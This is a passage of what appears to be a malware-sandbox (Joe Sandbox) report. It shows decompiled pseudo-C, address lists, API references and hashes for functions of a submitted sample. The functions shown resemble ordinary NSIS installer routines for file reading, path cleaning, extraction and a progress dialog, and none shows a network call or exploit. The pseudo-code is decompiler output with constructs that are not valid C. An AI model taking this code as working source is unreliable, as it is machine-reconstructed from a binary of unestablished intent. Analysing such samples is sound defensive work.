												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040678E(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406790
0x00406799
0x004067b0
0x004067b0
0x004067b7
0x004067c3
0x004067c3
0x004067c6
0x004067c9
0x004067ce
0x004067d0
0x004067d9
0x004067dd
0x004067fa
0x00406802
0x00406802
0x00406807
0x00406809
0x0040680c
0x00406811
0x00406812
0x00406816
0x00406816
0x00406817
0x0040681e
0x00406820
0x00406827
0x00000000
0x00000000
0x0040682f
0x00406835
0x00000000
0x00000000
0x00000000
0x00406835
0x0040683a

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,770F3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
CharNextW.USER32(?,00000000,770F3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
CharPrevW.USER32(?,?,770F3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040678F
*?|<>/":, xrefs: 004067E0

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e2c
0x00404e39
0x00404e3f
0x00404e7d
0x00404e7d
0x00404e8c
0x00404e93
0x00000000
0x00404e95
0x00404e41
0x00404e50
0x00404e58
0x00404e5b
0x00404e6d
0x00404e73
0x00404e7a
0x00000000
0x00404e7a
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
GetMessagePos.USER32 ref: 00404E41
ScreenToClient.USER32(?,?), ref: 00404E5B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93

Strings

f, xrefs: 00404E6F

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414eb8; // 0x4af63
					_t11 =  *0x420ec4;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(0004AF63,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 6E552655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E552655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E6E5512BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M6E552784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x6e55407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6e55409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6E551510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x6e55506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x6e55506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x6e55506c);
								goto L17;
							case 5:
								_push( *0x6e55506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6e555000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E6E551381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E6E551312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x6e55265f
0x6e552661
0x6e552665
0x6e552674
0x6e552678
0x6e55267d
0x6e55267d
0x6e552685
0x6e55268c
0x6e552692
0x00000000
0x6e552699
0x00000000
0x00000000
0x6e5526a1
0x6e5526a5
0x6e5526a8
0x6e5526ac
0x6e5526b3
0x6e5526b7
0x6e5526bd
0x6e5526bf
0x6e5526c1
0x6e5526c1
0x6e5526c8
0x00000000
0x00000000
0x6e5526d1
0x00000000
0x00000000
0x6e5526d8
0x6e5526de
0x6e5526e8
0x6e5526ee
0x6e5526f3
0x00000000
0x00000000
0x6e552714
0x00000000
0x00000000
0x6e5526fa
0x6e552700
0x6e552701
0x6e552703
0x00000000
0x00000000
0x6e55271c
0x6e55271e
0x6e552724
0x6e55272a
0x6e55272a
0x00000000
0x00000000
0x6e552692
0x6e55272d
0x6e55272d
0x6e552732
0x6e552743
0x6e552743
0x6e552749
0x6e55274e
0x6e552753
0x6e55275f
0x6e552764
0x00000000
0x6e552769
0x6e552755
0x6e552756
0x6e55276a
0x6e55276a
0x6e552753
0x6e55276b
0x6e55276c
0x6e55276f
0x6e552783

APIs

Part of subcall function 6E5512BB: GlobalAlloc.KERNELBASE(00000040,?,6E5512DB,?,6E55137F,00000019,6E5511CA,-000000A0), ref: 6E5512C5

GlobalFree.KERNEL32(?), ref: 6E552743
GlobalFree.KERNEL32(00000000), ref: 6E552778

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: caf9ff18d35286a755cb29ca37328c56f931ab8f1681be18034ac6fd3d1aef17
Instruction ID: 872dbf2c0b8985f984f543e650004d0197d7184ba18546f16d58b6418b898bbb
Opcode Fuzzy Hash: caf9ff18d35286a755cb29ca37328c56f931ab8f1681be18034ac6fd3d1aef17
Instruction Fuzzy Hash: CF31CF39114A01EFCB15CFD5C9D4C6A7BFAEB86314725892EF20187320DB306C269B61

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E4D(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FD2(_t55);
				_t29 = E00405FF7(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a234;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034AF(_t49);
							E00403499(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
Opcode Fuzzy Hash: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98

Uniqueness

Uniqueness Score: -1.00%

Function 6E552480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E552480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E6E55135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E6E5512E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M6E5525F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E6E5513B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E6E5513B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x6e55506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6e55506c, __eax,  *0x6e55506c, 0, 0);
									goto L27;
								case 4:
									__eax = E6E5512CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E6E5513B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x6e55506c =  *0x6e555074 + ( *(__esi + 0x18) - 1) *  *0x6e55506c * 2 + 0x18;
									 *__ebx =  *0x6e555074 + ( *(__esi + 0x18) - 1) *  *0x6e55506c * 2 + 0x18;
									asm("cdq");
